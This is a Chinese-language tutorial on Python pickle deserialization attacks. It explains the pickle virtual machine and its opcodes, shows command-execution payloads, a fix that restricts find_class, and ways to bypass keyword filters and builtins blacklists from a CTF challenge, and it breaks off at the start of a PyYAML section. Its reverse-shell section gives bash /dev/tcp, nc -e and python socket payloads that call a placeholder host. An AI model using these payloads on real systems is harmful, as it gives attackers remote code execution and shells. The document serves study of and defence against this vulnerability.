python反序列化

python的序列化和反序列化

与PHP,Java类似,python的序列化和反序列化就是对象与数据的相互转换,是为了解决对象传输与持久化存储问题

在Python中序列化一般通过pickle模块和json模块实现

pickle模块和json模块提供了dumps()、dump()、loads()、load()四个函数

函数 说明
dump() 对象反序列化到文件对象并存入文件
dumps() 对象反序列化为 bytes 对象
load() 对象反序列化并从文件中读取数据
loads() 从 bytes 对象反序列化

与json相比,pickle以二进制储存,不易人工阅读;json可以跨语言,而pickle是Python专用的;pickle能表示python几乎所有的类型(包括自定义类型),json只能表示一部分内置类型且不能表示自定义类型

PVM

python序列化和反序列化的过程都是发生在PVM(Pickle Virtual Machine)上的,它是Python标准库中的一部分,由Python的pickle模块提供支持

pvm由指令处理器、栈区和内存区三部分组成

  • 指令处理器:也就是引擎,从流中读取opcode和参数, 并对其进行解释处理. 重复这个动作, 直到遇到.这个结束符后停止, 最终留在栈顶的值将被作为反序列化对象返回

  • 栈区:由Python的list实现, 被用来临时存储数据、参数以及对象, 在不断的进出栈过程中完成对数据流的反序列化操作, 并最终在栈顶生成反序列化的结果

  • 内存区:或者称为标签区,由Python的dict实现, 为PVM的整个生命周期提供存储(将反序列化完成的数据以 key-value 的形式储存在memo中,以便后来使用)

PVM 协议

因为python版本的不同,所以默认使用的协议不同。因为PVM的指令集用的协议有很大的差别,所以不同的python版本序列化出来的数据是有差别的

可以通过protocol=num来选择opcode的版本,pickle协议是向前兼容的

1
2
3
4
5
6
7
8
9
10
11
import pickle


class Test:
def __init__(self, name='lewiserii'):
self.name = name


test = Test()
for i in range(6):
print('[+] pickle v{}: {}'.format(str(i), pickle.dumps(test, protocol=i)))
1
2
3
4
5
6
[+] pickle v0: b'ccopy_reg\n_reconstructor\np0\n(c__main__\nTest\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\n(dp5\nVname\np6\nVlewiserii\np7\nsb.'
[+] pickle v1: b'ccopy_reg\n_reconstructor\nq\x00(c__main__\nTest\nq\x01c__builtin__\nobject\nq\x02Ntq\x03Rq\x04}q\x05X\x04\x00\x00\x00nameq\x06X\t\x00\x00\x00lewiseriiq\x07sb.'
[+] pickle v2: b'\x80\x02c__main__\nTest\nq\x00)\x81q\x01}q\x02X\x04\x00\x00\x00nameq\x03X\t\x00\x00\x00lewiseriiq\x04sb.'
[+] pickle v3: b'\x80\x03c__main__\nTest\nq\x00)\x81q\x01}q\x02X\x04\x00\x00\x00nameq\x03X\t\x00\x00\x00lewiseriiq\x04sb.'
[+] pickle v4: b'\x80\x04\x95/\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x04Test\x94\x93\x94)\x81\x94}\x94\x8c\x04name\x94\x8c\tlewiserii\x94sb.'
[+] pickle v5: b'\x80\x05\x95/\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x04Test\x94\x93\x94)\x81\x94}\x94\x8c\x04name\x94\x8c\tlewiserii\x94sb.'

不同版本间的区别

1
2
3
4
5
6
v0 版协议是原始的"人类可读"协议,并且向后兼容早期版本的 Python
v1 版协议是较早的二进制格式,它也与早期版本的 Python 兼容
v2 版协议是在 Python 2.3 中加入的,它为存储 new-style class 提供了更高效的机制(参考 PEP 307)
v3 版协议是在 Python 3.0 中加入的,它显式地支持 bytes 字节对象,不能使用 Python 2.x 解封。这是 Python 3.0-3.7 的默认协议
v4 版协议添加于 Python 3.4。它支持存储非常大的对象,能存储更多种类的对象,还包括一些针对数据格式的优化(参考 PEP 3154)。它是 Python 3.8 使用的默认协议
v5 版协议是在 Python 3.8 中加入的。它增加了对带外数据的支持,并可加速带内数据处理(参考 PEP 574)

opcode

opcode也就是操作码,是序列化内容的核心,并且 opcode 是单字节的

$PYTHON/Lib/pickle.py中可以查看到完整的opcode

以下是V0协议中一些常见的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
MARK           = b'('   # 向栈中压入一个 MARK 标记
STOP = b'.' # 程序结束,栈顶的一个元素作为 pickle.loads() 的返回值
POP = b'0' # 丢弃栈顶对象
POP_MARK = b'1' # 丢弃栈顶到最顶层的标记对象
DUP = b'2' # 重复的顶部堆栈项目
FLOAT = b'F' # 实例化一个 float 对象
INT = b'I' # 实例化一个 int 或者 bool 对象
NONE = b'N' # 栈中压入 None
REDUCE = b'R' # 从栈上弹出两个对象,第一个对象作为参数(必须为元组),第二个对象作为函数,然后调用该函数并把结果压回栈
STRING = b'S' # 实例化一个字符串对象
UNICODE = b'V' # 实例化一个 UNICODE 字符串对象
APPEND = b'a' # 将栈的第一个元素 append 到第二个元素(必须为列表)中
BUILD = b'b' # 使用栈中的第一个元素(储存多个 属性名-属性值 的字典)对第二个元素(对象实例)进行属性设置,调用 __setstate__ 或 __dict__.update()
GLOBAL = b'c' # 获取一个全局对象或 import 一个模块(会调用 import 语句,能够引入新的包),压入栈
DICT = b'd' # 寻找栈中的上一个 MARK,并组合之间的数据为字典(数据必须有偶数个,即呈 key-value 对),弹出组合,弹出 MARK,压回结果
EMPTY_DICT = b'}' # 向栈中直接压入一个空字典
APPENDS = b'e' # 寻找栈中的上一个 MARK,组合之间的数据并 extends 到该 MARK 之前的一个元素(必须为列表)中
GET = b'g' # 将 memo[n] 的压入栈
INST = b'i' # 相当于 c 和 o 的组合,先获取一个全局函数,然后从栈顶开始寻找栈中的上一个 MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象)
LIST = b'l' # 从栈顶开始寻找栈中的上一个 MARK,并组合之间的数据为列表
EMPTY_LIST = b']' # 向栈中直接压入一个空列表
OBJ = b'o' # 从栈顶开始寻找栈中的上一个 MARK,以之间的第一个数据(必须为函数)为 callable,第二个到第 n 个数据为参数,执行该函数(或实例化一个对象),弹出 MARK,压回结果,
PUT = b'p' # 将栈顶对象储存至 memo[n]
SETITEM = b's' # 将栈的第一个对象作为 value,第二个对象作为 key,添加或更新到栈的第三个对象(必须为列表或字典,列表以数字作为 key)中
TUPLE = b't' # 寻找栈中的上一个 MARK,并组合之间的数据为元组,弹出组合,弹出 MARK,压回结果
EMPTY_TUPLE = b')' # 向栈中直接压入一个空元组
SETITEMS = b'u' # 寻找栈中的上一个 MARK,组合之间的数据(数据必须有偶数个,即呈 key-value 对)并全部添加或更新到该 MARK 之前的一个元素(必须为字典)中

处理序列化字节流的过程

这里用一段简短的字节码来演示利用过程:

1
2
3
4
cos
system
(S'whoami'
tR.

按照pickle.py中的源码分析处理序列化字节流的过程

c

获取一个全局对象或 import 一个模块(会调用 import 语句,能够引入新的包),压入栈

源代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
def load_global(self):
# 读取一行数据,去掉换行符,作为模块名,例子中是os
module = self.readline()[:-1].decode("utf-8")
# 读取下一行数据,作为类名,例子中是system
name = self.readline()[:-1].decode("utf-8")
# 调用find_class
klass = self.find_class(module, name)
# 获取模块后添加到当前栈中
self.append(klass)
dispatch[GLOBAL[0]] = load_global

def find_class(self, module, name):
# Subclasses may override this.
# 在系统审计功能记录pickle.find_class事件,附带参数module和name
sys.audit('pickle.find_class', module, name)

# 如果协议版本小于3且开启了fix_imports标志,则进行特殊的名称和模块映射处理
if self.proto < 3 and self.fix_imports:
# 如果(module, name)在NAME_MAPPING中,则使用映射的名称代替原名称
if (module, name) in _compat_pickle.NAME_MAPPING:
module, name = _compat_pickle.NAME_MAPPING[(module, name)]
# 如果module在IMPORT_MAPPING中,则使用映射的模块名代替原模块名
elif module in _compat_pickle.IMPORT_MAPPING:
module = _compat_pickle.IMPORT_MAPPING[module]

# 动态加载指定模块
__import__(module, level=0)
# 如果协议版本大于4则使用_getattribute方法获取对象
if self.proto >= 4:
return _getattribute(sys.modules[module], name)[0]
# 否则使用getattr方法获取对象
else:
return getattr(sys.modules[module], name)

# 与getattr类似
def _getattribute(obj, name):
# 将属性名按照点号(.)进行分割
for subpath in name.split('.'):
if subpath == '<locals>':
raise AttributeError("Can't get local attribute {!r} on {!r}"
.format(name, obj))
try:
parent = obj
obj = getattr(obj, subpath)
except AttributeError:
raise AttributeError("Can't get attribute {!r} on {!r}"
.format(name, obj)) from None
return obj, parent

(

向栈中压入一个 MARK 标记

源代码:

1
2
3
4
5
6
7
8
def load_mark(self):
# 将当前stack列表添加到metastack中,相当于标记
self.metastack.append(self.stack)
# 清空当前栈
self.stack = []
# 设置一个简化的append方法
self.append = self.stack.append
dispatch[MARK[0]] = load_mark

S

实例化一个字符串对象

源代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
def load_string(self):
# 读取一行数据,去除换行符
data = self.readline()[:-1]
# 去掉最外面的引号
if len(data) >= 2 and data[0] == data[-1] and data[0] in b'"\'':
data = data[1:-1]
else:
raise UnpicklingError("the STRING opcode argument must be quoted")
# 对数据解码后添加到当前栈中
self.append(self._decode_string(codecs.escape_decode(data)[0]))
dispatch[STRING[0]] = load_string

def _decode_string(self, value):
# Used to allow strings from Python 2 to be decoded either as
# bytes or Unicode strings. This should be used only with the
# STRING, BINSTRING and SHORT_BINSTRING opcodes.
if self.encoding == "bytes":
return value
else:
return value.decode(self.encoding, self.errors)

t

寻找栈中的上一个 MARK,并组合之间的数据为元组,弹出组合,弹出 MARK,压回结果

源代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def load_tuple(self):
# 弹出当前栈中数据
items = self.pop_mark()
# 转成tuple类型并添加到还原后的栈中
self.append(tuple(items))
dispatch[TUPLE[0]] = load_tuple


def pop_mark(self):
# 返回当前的stack到items
items = self.stack
# 从metastack还原之前的stack
self.stack = self.metastack.pop()
self.append = self.stack.append
return items

R

从栈上弹出两个对象,第一个对象作为参数(必须为元组),第二个对象作为函数,然后调用该函数并把结果压回栈

源代码:

1
2
3
4
5
6
7
8
9
def load_reduce(self):
stack = self.stack
# 第一个对象作为参数
args = stack.pop()
# 第二个对象作为函数
func = stack[-1]
# 调用func函数,并把结果赋给栈顶
stack[-1] = func(*args)
dispatch[REDUCE[0]] = load_reduce

.

程序结束,栈顶的一个元素作为 pickle.loads() 的返回值

源代码:

1
2
3
4
5
6
# 结束反序列化
def load_stop(self):
# 栈顶的值作为返回值
value = self.stack.pop()
raise _Stop(value)
dispatch[STOP[0]] = load_stop

所以可以得到以下解释

c后面跟的是模块名,换行之后的是类名,相当于将os.system放入栈中,然后放入一个标记符,接着将字符串 whoami 放入栈中,遇到t将栈中的数据弹出,一直到标记,并转为 tuple 再存入栈中,同时标记符消失,遇到R后将元组取出,作为参数放入函数中执行后将结果返回

可以看作执行了os.system('whoami')

pickletools

当字节码很多的时候一个一个对着表去读会很麻烦,所以Python提供了pickletools工具,便于人工解读opcode

pickletools常用的有pickletools.dispickletools.optimize

pickletools.dis:具有反汇编的功能,可以以可读性较强的方式展示一个序列化对象

pickletools.optimize:对一个序列化结果进行优化(消除未使用的 PUT 操作码)

常见利用思路

漏洞产生原因是用户可控的反序列化入口点

魔术方法 __reduce__()

PVM 的 操作码 R 就是 __reduce__() 的返回值的一个底层实现
与php中的__wakeup()方法类似,python在反序列化时会先调用__reduce__()魔术方法,所以我们可以利用这一特点触发恶意代码

一个利用__reduce__()的例子,在能够传入可控的 pickle.loads 的 data 时就可以生效

但是需要注意reduce一次只能执行一个函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import pickle
import pickletools
import os

# 注意python2与python3 之间的新式类与旧式类的区别,python2需要手动继承object
class Test(object):
def __reduce__(self):
shell = """whoami""" # 要执行的命令
return os.system, (shell,) # reduce函数必须返回元组或字符串


test = Test()
a = pickle.dumps(test, protocol=0)
pickle.loads(a)
print(a)
pickletools.dis(pickletools.optimize(a))

全局变量覆盖

可以通过覆盖一些凭证达到绕过身份验证的目的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import pickle
import pickletools

import secret

print("变量的值为:" + secret.key)

opcode = b'''c__main__
secret
(S'key'
S'123'
db.'''

pickle.loads(opcode)

print("变量的值为:" + secret.key)
pickletools.dis(opcode)

全局变量引用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import pickle
import pickletools
import secret

class Target:
def __init__(self):
obj = pickle.loads(b'ccopy_reg\n_reconstructor\n(c__main__\nTarget\nc__builtin__\nobject\nNtR(dVpwd\nVa\nsb.')
if obj.pwd == secret.pwd:
print("Hello, admin!")
else:
print("No")


test = Target()

上面的例子中我们并不知道secret.pwd的值,要使if成立,可以使用c来实现

c的作用是 获取一个全局对象或 import 一个模块(会调用 import 语句,能够引入新的包),压入栈

1
2
3
b'ccopy_reg\n_reconstructor\n(c__main__\nTarget\nc__builtin__\nobject\nNtR(dVpwd\nVaaa\nsb.'

b'ccopy_reg\n_reconstructor\n(c__main__\nTarget\nc__builtin__\nobject\nNtR(dVpwd\ncsecret\npwd\nsb.'

与php反序列化中的$this->b = &$this->a;引用绕过类似,只不过python用的是import

命令执行

pickle中用来构造函数执行的字节码有四个个:Rio以及b +__setstate__()

R

上文中提到的例子用的就是R来实现Rce

R: 从栈上弹出两个对象,第一个对象作为参数(必须为元组),第二个对象作为函数,然后调用该函数并把结果压回栈

1
2
3
4
opcode=b'''cos
system
(S'whoami'
tR.'''

i

相当于 c 和 o 的组合,先获取一个全局函数,然后从栈顶开始寻找栈中的上一个 MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
def load_inst(self):
# 前三行代码与c的代码一致,用来调用
module = self.readline()[:-1].decode("ascii")
name = self.readline()[:-1].decode("ascii")
klass = self.find_class(module, name)
# 通过pop_mark()函数得到参数,利用_instantiate函数执行,将结果存入栈中
self._instantiate(klass, self.pop_mark())
dispatch[INST[0]] = load_inst


def _instantiate(self, klass, args):
if (args or not isinstance(klass, type) or
hasattr(klass, "__getinitargs__")):
try:
value = klass(*args)
except TypeError as err:
raise TypeError("in constructor for %s: %s" %
(klass.__name__, str(err)), sys.exc_info()[2])
else:
value = klass.__new__(klass)
self.append(value)
1
2
3
4
opcode=b'''(S'whoami'
ios
system
.'''

o

从栈顶开始寻找栈中的上一个 MARK,以之间的第一个数据(必须为函数)为 callable,第二个到第 n 个数据为参数,执行该函数(或实例化一个对象),弹出 MARK,压回结果

1
2
3
4
5
6
7
8
def load_obj(self):
# 弹出栈中所有数据赋值给args
args = self.pop_mark()
# 在args中弹出第一个作为类名
cls = args.pop(0)
# 利用_instantiate函数执行并将结果压回栈中
self._instantiate(cls, args)
dispatch[OBJ[0]] = load_obj
1
2
3
4
opcode=b'''(cos
system
S'whoami'
o.'''

b + __setstate__()

使用栈中的第一个元素(储存多个 属性名-属性值 的字典)对第二个元素(对象实例)进行属性设置,调用 __setstate__ 或 __dict__.update()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
def load_build(self):
stack = self.stack
# 获取栈顶元素
state = stack.pop()
# 获取栈中倒数第二个元素
inst = stack[-1]
# 获取倒数第二个元素的__setstate__属性
setstate = getattr(inst, "__setstate__", None)

# setstate 不为None则调用inst对象的__setstate,将state作为参数传递给它
# 一般不存在__setstate__方法,setstate(state)会造成任意函数调用
if setstate is not None:
setstate(state)
return
slotstate = None

# 如果state是元组类型且长度为2,则将其分解成state, slotstate
if isinstance(state, tuple) and len(state) == 2:
state, slotstate = state

if state:
inst_dict = inst.__dict__
intern = sys.intern
# 遍历state字典,将键名赋值给inst_dict,键值直接赋值
for k, v in state.items():
if type(k) is str:
inst_dict[intern(k)] = v
else:
inst_dict[k] = v

if slotstate:
# 遍历slotstate字典,并将其键值对赋值给inst对象
for k, v in slotstate.items():
setattr(inst, k, v)
dispatch[BUILD[0]] = load_build

因为一般不存在__setstate__,所以不会触发setstate(state)。但是如果手动压入一个字典{"__setstate__":os.system},执行b。就会添加一个新的键值对,再继续压入命令,再执行b时,setstate就不会为None了,而是我们传入的os.system,就是os.system(state),而state就是我们传入的命令,从而完成rce

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import pickle
import pickletools


class Test(object):
def __init__(self, name):
self.name = "aa"


opcode = b'''(c__main__
Test
)o(S"__setstate__"
cos
system
dbS"whoami"
b.'''

pickle.loads(opcode)
pickletools.dis(opcode)

'''
lewiserii\lewiserii
0: ( MARK
1: c GLOBAL '__main__ Test'
16: ) EMPTY_TUPLE
17: o OBJ (MARK at 0)
18: ( MARK
19: S STRING '__setstate__'
35: c GLOBAL 'os system'
46: d DICT (MARK at 18)
47: b BUILD
48: S STRING 'whoami'
58: b BUILD
59: . STOP
highest protocol among opcodes = 1
'''

反弹shell

既然可以执行命令了,那么肯定可以反弹shell了,以下是几种payload

利用i执行命令建立shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import base64
import pickle

payload= b'''(S'python -c 'import os,pty,socket;s=socket.socket();s.connect(("ip", port));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")''
ios
system
.'''

payload2 = b'''(S'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"'
ios
popen
.'''

print(base64.b64encode(pickle.dumps(payload)))

reduce直接执行nc命令

1
2
3
4
5
6
7
8
9
import base64
import pickle

class Test(object):
def __reduce__(self):
return (eval, ("__import__('os').system('nc ip port -e/bin/sh')",))

payload = Test()
print(base64.b64encode(pickle.dumps(payload)))

pker

pker是由eddieivan01编写的以遍历Python AST的形式来自动化解析pickle opcode的工具。

漏洞修复

对于pickle反序列化漏洞,常见的修复方法是重写Unpickler.find_class()来限制全局变量

例如:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import builtins
import io
import pickle

# 需要限制反序列化对象时可以使用的类
safe_builtins = {
'range', # range类型
'complex', # 复数类型
'set', # 集合类型
'frozenset', # 冻结集合类型
'slice', # 切片类型
}

# 定义RestrictedUnpickler类继承自pickle.Unpickler
class RestrictedUnpickler(pickle.Unpickler):
#重写了find_class方法
def find_class(self, module, name):
# 如果被反序列化的对象的类属于builtins模块中的安全类,则返回该类
if module == "builtins" and name in safe_builtins:
return getattr(builtins, name)
# 如果不是安全类,就抛出异常,禁止反序列化
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
(module, name))

# 定义一个帮助函数restricted_loads来反序列化对象
def restricted_loads(s):
# 将传入的字符串s转换为bytes,并使用RestrictedUnpickler类反序列化
return RestrictedUnpickler(io.BytesIO(s)).load()

opcode=b"cos\nsystem\n(S'echo hello world'\ntR."
restricted_loads(opcode)


###结果如下
Traceback (most recent call last):
...
_pickle.UnpicklingError: global 'os.system' is forbidden

以上例子通过重写Unpickler.find_class()方法,限制调用模块只能为builtins,且函数必须在白名单内,否则抛出异常。

bypass

关键字绕过

利用opcode进行变量覆盖时,代码中可能会过滤了我们想要覆盖的属性关键字

例如

1
2
3
4
5
6
7
8
9
10
11
12
import pickle
import pickletools
import secret

print("变量的值为:" + secret.key)

if b'key' in opcode:
print('NoNoNo')
else:
pickle.loads(opcode)

print("变量的值为:" + str(secret.key))

正常的opcode应该是

1
2
3
4
5
opcode = b'''c__main__
secret
(S'key'
S'123'
db.'''

方法一:十六进制

因为 S 操作符是可以识别十六进制的,所以这里也可以对字符进行十六进制编码来绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# S'key' = S'\x6B\x65\x79'
import pickle
import pickletools
import secret

print("变量的值为:" + secret.key)

opcode = b'''c__main__
secret
(S'\\x6B\\x65\\x79'
S'111'
db.'''

if b'key' in opcode:
print('NoNoNo')
else:
pickle.loads(opcode)

print("变量的值为:" + str(secret.key))


'''
变量的值为:123
变量的值为:111
'''

方法二:unicode编码

同样的,V 操作符也可以识别unicode编码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# S'key' = V\u006b\u0065\u0079
import pickle
import pickletools
import secret

print("变量的值为:" + secret.key)

opcode = b'''c__main__
secret
(V\u006b\u0065\u0079
S'111111'
db.'''

if b'key' in opcode:
print('NoNoNo')
else:
pickle.loads(opcode)

print("变量的值为:" + str(secret.key))


'''
变量的值为:123
变量的值为:111111
'''

方法三:利用内置函数获取关键字

在python中,当我们导入某个模块后,可以通过dir(sys.modules['xxx'])来获取其全部属性

例如

1
2
3
4
5
6
7
8
import secret
import sys

print(dir(sys.modules['secret']))

'''
['__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', 'key']
'''

但是因为pickle不持支列表索引和字典索引,所以需要用reversed()+next()来获取元素

1
2
3
4
5
6
7
8
import secret
import sys

print(next(reversed(dir(sys.modules['secret']))))

'''
key
'''

转换成opcode

1
2
3
4
5
6
# 构造出dir
opcode=b'''(c__main__
secret
i__builtin__
dir
.'''
1
2
3
4
5
6
7
8
# 构造reversed
opcode=b'''((c__main__
secret
i__builtin__
dir
i__builtin__
reversed
.'''
1
2
3
4
5
6
7
8
9
10
# 构造next
opcode=b'''(((c__main__
secret
i__builtin__
dir
i__builtin__
reversed
i__builtin__
next
.'''
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# 变量覆盖
import pickle
import pickletools
import secret

print("变量的值为:" + secret.key)

opcode=b'''c__main__
secret
((((c__main__
secret
i__builtin__
dir
i__builtin__
reversed
i__builtin__
next
S'111'
db.'''

if b'key' in opcode:
print('NoNoNo')
else:
pickle.loads(opcode)

print("变量的值为:" + str(secret.key))


'''
变量的值为:123
变量的值为:111
'''

绕过builtins

对于上文提到的重写find_class()方法来限制调用模块,如果采用的是黑名单的方式,那么就有可能绕过其限制

例如code-breaking 2018 picklecode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import pickle
import io
import builtins

class RestrictedUnpickler(pickle.Unpickler):
blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'}

def find_class(self, module, name):
# Only allow safe classes from builtins.
if module == "builtins" and name not in self.blacklist:
return getattr(builtins, name)
# Forbid everything else.
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
(module, name))

def restricted_loads(s):
"""Helper function analogous to pickle.loads()."""
return RestrictedUnpickler(io.BytesIO(s)).load()

同样是限制了使用的模块只能为builtins,加上一个黑名单。但是我们可以利用getattr来获取一些黑名单函数,例如builtins.getattr('builtins', 'eval')

转换成payload:builtins.getattr(builtins, 'eval'),('__import__("os").system("whoami")',)

然后开始手搓opcode

首先调用builtins.getattr

1
2
cbuiltins
getattr

然后注意不能直接压入builtins,需要构造出一个builtins模块再来传给getattr

例如可以从builtins.globals()中拿到builtins模块,但是因为返回值是<class 'dict'>,所以还需要一个builtins.dict中的get函数来取出builtins

变换后的payload:builtins.getattr(builtins.getattr(builtins.dict,'get')(builtins.globals(),'builtins'),'eval')('__import__("os").system("whoami")',)

继续编写opcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#构造出get函数
import pickle
import pickletools

opcode = b'''cbuiltins
getattr
(cbuiltins
dict
S'get'
tR.
'''

pickletools.dis(opcode)
print(pickle.loads(opcode))

'''
0: c GLOBAL 'builtins getattr'
18: ( MARK
19: c GLOBAL 'builtins dict'
34: S STRING 'get'
41: t TUPLE (MARK at 18)
42: R REDUCE
43: . STOP
highest protocol among opcodes = 0
<method 'get' of 'dict' objects>
'''
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# 获取globals()字典
import pickle
import pickletools

opcode = b'''cbuiltins
globals
)R.
'''

pickletools.dis(opcode)
print(pickle.loads(opcode))

'''
0: c GLOBAL 'builtins globals'
18: ) EMPTY_TUPLE
19: R REDUCE
20: . STOP
highest protocol among opcodes = 1
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x000002490202C9D0>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': 'C:\\Users\\lewiserii\\Desktop\\test\\2.py', '__cached__': None, 'pickle': <module 'pickle' from 'C:\\Python\\Python311\\Lib\\pickle.py'>, 'pickletools': <module 'pickletools' from 'C:\\Python\\Python311\\Lib\\pickletools.py'>, 'opcode': b'cbuiltins\nglobals\n)R.\n'}
'''
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# 组合get()和globals()字典,获取builtins模块
import pickle
import pickletools

opcode = b'''cbuiltins
getattr
(cbuiltins
dict
S'get'
tR(cbuiltins
globals
)RS'__builtins__'
tR.'''

pickletools.dis(opcode)
print(pickle.loads(opcode))

'''
0: c GLOBAL 'builtins getattr'
18: ( MARK
19: c GLOBAL 'builtins dict'
34: S STRING 'get'
41: t TUPLE (MARK at 18)
42: R REDUCE
43: ( MARK
44: c GLOBAL 'builtins globals'
62: ) EMPTY_TUPLE
63: R REDUCE
64: S STRING '__builtins__'
80: t TUPLE (MARK at 43)
81: R REDUCE
82: . STOP
highest protocol among opcodes = 1
<module 'builtins' (built-in)>
'''
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# 获取eval
import pickle
import pickletools

opcode=b'''cbuiltins
getattr
(cbuiltins
getattr
(cbuiltins
dict
S'get'
tR(cbuiltins
globals
)RS'__builtins__'
tRS'eval'
tR.'''

pickletools.dis(opcode)
print(pickle.loads(opcode))

'''
0: c GLOBAL 'builtins getattr'
18: ( MARK
19: c GLOBAL 'builtins getattr'
37: ( MARK
38: c GLOBAL 'builtins dict'
53: S STRING 'get'
60: t TUPLE (MARK at 37)
61: R REDUCE
62: ( MARK
63: c GLOBAL 'builtins globals'
81: ) EMPTY_TUPLE
82: R REDUCE
83: S STRING '__builtins__'
99: t TUPLE (MARK at 62)
100: R REDUCE
101: S STRING 'eval'
109: t TUPLE (MARK at 18)
110: R REDUCE
111: . STOP
highest protocol among opcodes = 1
<built-in function eval>
'''
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
# 执行命令
import pickle
import pickletools

opcode=b'''cbuiltins
getattr
(cbuiltins
getattr
(cbuiltins
dict
S'get'
tR(cbuiltins
globals
)RS'__builtins__'
tRS'eval'
tR(S'__import__("os").system("whoami")'
tR.
'''

pickletools.dis(opcode)
print(pickle.loads(opcode))

'''
0: c GLOBAL 'builtins getattr'
18: ( MARK
19: c GLOBAL 'builtins getattr'
37: ( MARK
38: c GLOBAL 'builtins dict'
53: S STRING 'get'
60: t TUPLE (MARK at 37)
61: R REDUCE
62: ( MARK
63: c GLOBAL 'builtins globals'
81: ) EMPTY_TUPLE
82: R REDUCE
83: S STRING '__builtins__'
99: t TUPLE (MARK at 62)
100: R REDUCE
101: S STRING 'eval'
109: t TUPLE (MARK at 18)
110: R REDUCE
111: ( MARK
112: S STRING '__import__("os").system("whoami")'
149: t TUPLE (MARK at 111)
150: R REDUCE
151: . STOP
highest protocol among opcodes = 1
lewiserii\lewiserii
0
'''
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# 不使用R字节码
import pickle
import pickletools

opcode = b'\x80\x03(cbuiltins\ngetattr\np0\ncbuiltins\ndict\np1\nX\x03\x00\x00\x00getop2\n0(g2\n(cbuiltins\nglobals\noX\x0C\x00\x00\x00__builtins__op3\n(g0\ng3\nX\x04\x00\x00\x00evalop4\n(g4\nX\x21\x00\x00\x00__import__("os").system("whoami")o00.'

pickletools.dis(pickletools.optimize(opcode))
pickle.loads(opcode)

'''
0: \x80 PROTO 3
2: ( MARK
3: c GLOBAL 'builtins getattr'
21: q BINPUT 0
23: c GLOBAL 'builtins dict'
38: X BINUNICODE 'get'
46: o OBJ (MARK at 2)
47: q BINPUT 1
49: 0 POP
50: ( MARK
51: h BINGET 1
53: ( MARK
54: c GLOBAL 'builtins globals'
72: o OBJ (MARK at 53)
73: X BINUNICODE '__builtins__'
90: o OBJ (MARK at 50)
91: q BINPUT 2
93: ( MARK
94: h BINGET 0
96: h BINGET 2
98: X BINUNICODE 'eval'
107: o OBJ (MARK at 93)
108: q BINPUT 3
110: ( MARK
111: h BINGET 3
113: X BINUNICODE '__import__("os").system("whoami")'
151: o OBJ (MARK at 110)
152: 0 POP
153: 0 POP
154: . STOP
highest protocol among opcodes = 2
lewiserii\lewiserii
'''

opcode版本

有时可以通过改变opcode的版本来绕过一些对字母的过滤

PyYAML 反序列化

基础语法规则

1:大小写敏感

2:使用空格代替tab键缩进表示层级,对齐即可表示同级

3:和python一样使用’#’注释内容

4:!!表示强制类型转换

5:一个 .yml 文件中可以有多份配置文件,用 — 隔开

更多的语法规则可以看官方手册菜鸟教程

类型转换

在PyYAML中,可以通过 !! 来进行类型转换

site-packages/yaml/constructor.py中可以看到基础的类型转换过程

例如

1
2
3
4
5
6
7
8
9
10
11
# python2
# PyYAML4.2b4
import yaml
data = yaml.load('!!str 111')
print(data)
print(type(data))

'''
111
<type 'str'>
'''

对应的代码如下,add_constructor定义了一些基础的类型转换

1
2
3
SafeConstructor.add_constructor(
u'tag:yaml.org,2002:str',
SafeConstructor.construct_yaml_str)
1
2
3
4
5
